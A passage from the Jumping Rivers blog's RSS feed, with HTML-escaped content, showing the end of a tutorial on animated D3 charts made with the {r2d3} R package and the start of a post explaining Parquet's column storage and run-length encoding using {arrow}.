&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, add a line to call our new &lt;code&gt;drawLines()&lt;/code&gt; function at the bottom
of the script.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;drawLines()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby_final"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_final.js"&gt;&lt;/script&gt;
&lt;button type="button" onclick="plotFlexFinal($(&amp;#39;.blog-content&amp;#39;).width())" id="draw_lines_btn"&gt;
Animate!
&lt;/button&gt;
&lt;p&gt;Now we have a working, animated D3 visualisation! I’ve added a button
to the blogpost to redraw the plot, but you should see the graph animate
as you re-run your &lt;code&gt;r2d3()&lt;/code&gt; line.&lt;/p&gt;
&lt;h2 id="make-it-resizable"&gt;Make it resizable&lt;/h2&gt;
&lt;p&gt;You might’ve already noticed that your local plot is of a static size
and if you resize your RStudio window, your plot gets cut off. Luckily,
{r2d3} comes with built-in width and height objects that change based on
the size of the plot container. This means that we can use these
variables to make our plot flexibly resize as we resize the window.&lt;/p&gt;
&lt;p&gt;If we want to keep similar dimensions between the margins, plot width
and height and line and text sizes, you can replace your
constant-defining code at the top with the following, but you can play
around with the multipliers to determine what relationships you want
between sizes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {top&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; right&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.125&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bottom&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.05&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; left&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.075&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; width &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.right
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.bottom
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; lineWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.004&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; plotWidth
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; mediumText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.03&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; plotWidth
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; bigText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.04&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; plotWidth
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, if you re-run your plot, it should automatically resize when you
change the size of the window. And notice, because the plot is an SVG
(&lt;strong&gt;scalable&lt;/strong&gt; vector graphics) element, our plot stays sharp as we make
it bigger or smaller.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="https://github.com/jumpingrivers/blog"
style="font-size:25px"&gt;
&lt;img class="image-left"
src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/gh_logo.png"
style="width:32px; class:image-left"/&gt;
  Get the final .Rmd and .js files&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We’ve now created our first D3 visualisation from scratch using the
{r2d3} package in RStudio! As you can see, creating a line chart with
many lines requires a lot of code and so, if you’re creating a basic
plot for non-aesthetic purposes, sticking to {ggplot2} may make more
sense. However, if you want your plot to be an interactive website
statement piece or a creative, user-driven exploration of data or ideas,
D3 may better suit your needs. As this blogpost was aimed at beginners,
the end result is not particularly dramatic, but if this has inspired
you to learn more, I have provided some links to some amazing D3
creators and resources below.&lt;/p&gt;
&lt;h2 id="further-resources"&gt;Further resources&lt;/h2&gt;
&lt;p&gt;If you are looking for more comprehensive materials to learn D3, I
highly recommend these two video tutorials by Curran Kelleher: &lt;a href="https://www.youtube.com/watch?v=_8V5o2UHG0E" rel="external"&gt;Data
Visualization with D3.js&lt;/a&gt;
and &lt;a href="https://www.youtube.com/watch?v=2LhoCfjm8R4" rel="external"&gt;Data Visualization with D3, JavaScript,
React&lt;/a&gt;. Moreover, the &lt;a href="https://www.d3-graph-gallery.com/" rel="external"&gt;The
D3.js Graph Gallery&lt;/a&gt; by Yan Holtz is
a good reference website to see what kind of plots you can make and how.
Check out &lt;a href="https://observablehq.com/@d3/gallery" rel="external"&gt;Observable&lt;/a&gt; for plenty
of creative community-made D3 visualisations. Finally, if you need to be
convinced that you can make cool stuff in D3, I highly recommend
checking out &lt;a href="https://shirleywu.studio/" rel="external"&gt;Shirley Wu&lt;/a&gt;, &lt;a href="https://www.visualcinnamon.com/" rel="external"&gt;Nadieh
Bremer&lt;/a&gt;, and &lt;a href="https://wattenberger.com/" rel="external"&gt;Amelia
Wattenberger&lt;/a&gt;.&lt;/p&gt;
&lt;style&gt;
#draw_lines_btn {
display: block;
padding: 12px 22px;
color: #fff;
background-color: #4898a8;
border: 1px solid #4898a8;
font-family: "Lato", sans-serif;
border-radius: 4px;
cursor: pointer;
transition: 0.4s;
margin-bottom: 30px;
z-index: 3;
}
#draw_lines_btn:hover {
background-color: #5aaf50;
border: 1px solid #5aaf50;
}
&lt;/style&gt;
&lt;script&gt;
window.onresize = (event) =&gt; {
plotFlex1($(".blog-content").width())
plotFlex2($(".blog-content").width())
plotFlex3($(".blog-content").width())
plotFlexFinal($(".blog-content").width())
};
&lt;/script&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Understanding the Parquet file format</title><link>https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/</link><pubDate>Mon, 27 Sep 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/parquet-logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part of a series of related posts on Apache Arrow. Other posts
in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="This%20post"&gt;Understanding the Parquet file format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/" rel="external"&gt;Reading and Writing Data with
{arrow}&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/" rel="external"&gt;Parquet vs the RDS
Format&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://parquet.apache.org/" rel="external"&gt;Apache Parquet&lt;/a&gt; is a popular column
storage file format used by Hadoop systems, such as Pig,
&lt;a href="https://spark.apache.org/" rel="external"&gt;Spark&lt;/a&gt;, and Hive. The file format is
language independent and has a binary representation. Parquet is used to
efficiently store large data sets and has the extension &lt;code&gt;.parquet&lt;/code&gt;. This
blog post aims to understand how parquet works and the tricks it uses to
efficiently store data.&lt;/p&gt;
&lt;p&gt;Key features of parquet are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it’s cross platform&lt;/li&gt;
&lt;li&gt;it’s a recognised file format used by many systems&lt;/li&gt;
&lt;li&gt;it stores data in a column layout&lt;/li&gt;
&lt;li&gt;it stores metadata&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The latter two points allow for efficient storage and querying of data.&lt;/p&gt;
&lt;h2 id="column-storage"&gt;Column Storage&lt;/h2&gt;
&lt;p&gt;Suppose we have a simple data frame:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tibble&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;n1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;n2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;n3&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;35&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;62&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 3 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; id name age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 1 n1 20&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2 n2 35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 3 n3 62&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we stored this data set as a CSV file, what we see in the R terminal
is mirrored in the file storage format. This is &lt;em&gt;row&lt;/em&gt; storage. This is
efficient for file queries such as,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;SELECT&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;table_name&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;WHERE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;id&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We simply go to the 2nd row and retrieve that data. It’s also very easy
to append rows to the data set - we just add a row to the bottom of the
file. However, if we want to sum the data in the &lt;code&gt;age&lt;/code&gt; column, then this
is potentially inefficient. We would need to determine which value on
each row is related to &lt;code&gt;age&lt;/code&gt;, and extract that value.&lt;/p&gt;
&lt;p&gt;Parquet uses column storage. In column layouts, column data are stored
sequentially.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;n1&lt;span style="color:#6e7681"&gt; &lt;/span&gt;n2&lt;span style="color:#6e7681"&gt; &lt;/span&gt;n3&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;35&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;62&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this layout, queries such as&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;SELECT&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;dd&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;WHERE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;id&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;are now inconvenient. But if we want to sum up all ages, we simply go to
the third row and add up the numbers.&lt;/p&gt;
&lt;h2 id="reading-and-writing-parquet-files"&gt;Reading and writing parquet files&lt;/h2&gt;
&lt;p&gt;In R, we read and write parquet files using the {arrow} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# install.packages(&amp;#34;arrow&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageVersion&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#39;14.0.0.2&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To create a parquet file, we use &lt;code&gt;write_parquet()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Use the penguins data set&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(penguins, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;palmerpenguins&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a temporary file for the output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parquet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(penguins, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parquet)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To read the file, we use &lt;code&gt;read_parquet()&lt;/code&gt;. One of the benefits of using
parquet, is small file sizes. This is important when dealing with large
data sets, especially once you start incorporating the cost of cloud
storage. Reduced file size is achieved via two methods:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;File compression. This is specified via the &lt;code&gt;compression&lt;/code&gt; argument
in &lt;code&gt;write_parquet()&lt;/code&gt;. The default is
&lt;a href="https://en.wikipedia.org/wiki/Snappy_%5C%28compression%5C%29" rel="external"&gt;&lt;code&gt;snappy&lt;/code&gt;&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Clever storage of values (the next section).&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-parquet-file-format-big-data-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="parquet-encoding"&gt;Parquet Encoding&lt;/h2&gt;
&lt;p&gt;Since parquet uses column storage, values of the same type are number
stored together. This opens up a whole world of optimisation tricks that
aren’t available when we save data as rows, e.g. CSV files.&lt;/p&gt;
&lt;h3 id="run-length-encoding"&gt;Run length encoding&lt;/h3&gt;
&lt;p&gt;Suppose a column just contains a single value repeated on every row.
Instead of storing the same number over and over (as a CSV file would),
we can just record &lt;em&gt;“value X repeated N times”&lt;/em&gt;. This means that even
when N gets very large, the storage costs remain small. If we had more
than one value in a column, then we can use a simple look-up table. In
parquet, this is known as &lt;em&gt;run length&lt;/em&gt; encoding. If we have the
following column&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 4 4 4 4 4 1 2 2 2 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This would be stored as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;value 4, repeated 5 times&lt;/li&gt;
&lt;li&gt;value 1, repeated once&lt;/li&gt;
&lt;li&gt;value 2, reported 4 times&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To see this in action, lets create a simple example, where the character
&lt;code&gt;A&lt;/code&gt; is repeated multiple times in a data frame column:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;A&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1e6&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then create a couple of temporary files for our experiment&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parquet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;csv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and write the data to the files&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;arrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(x, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parquet, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;uncompressed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_csv&lt;/span&gt;(x, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; csv)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Using the {fs} package, we extract the size&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Could also use file.info()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(parquet, csv))[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;size&amp;#34;&lt;/span&gt;]
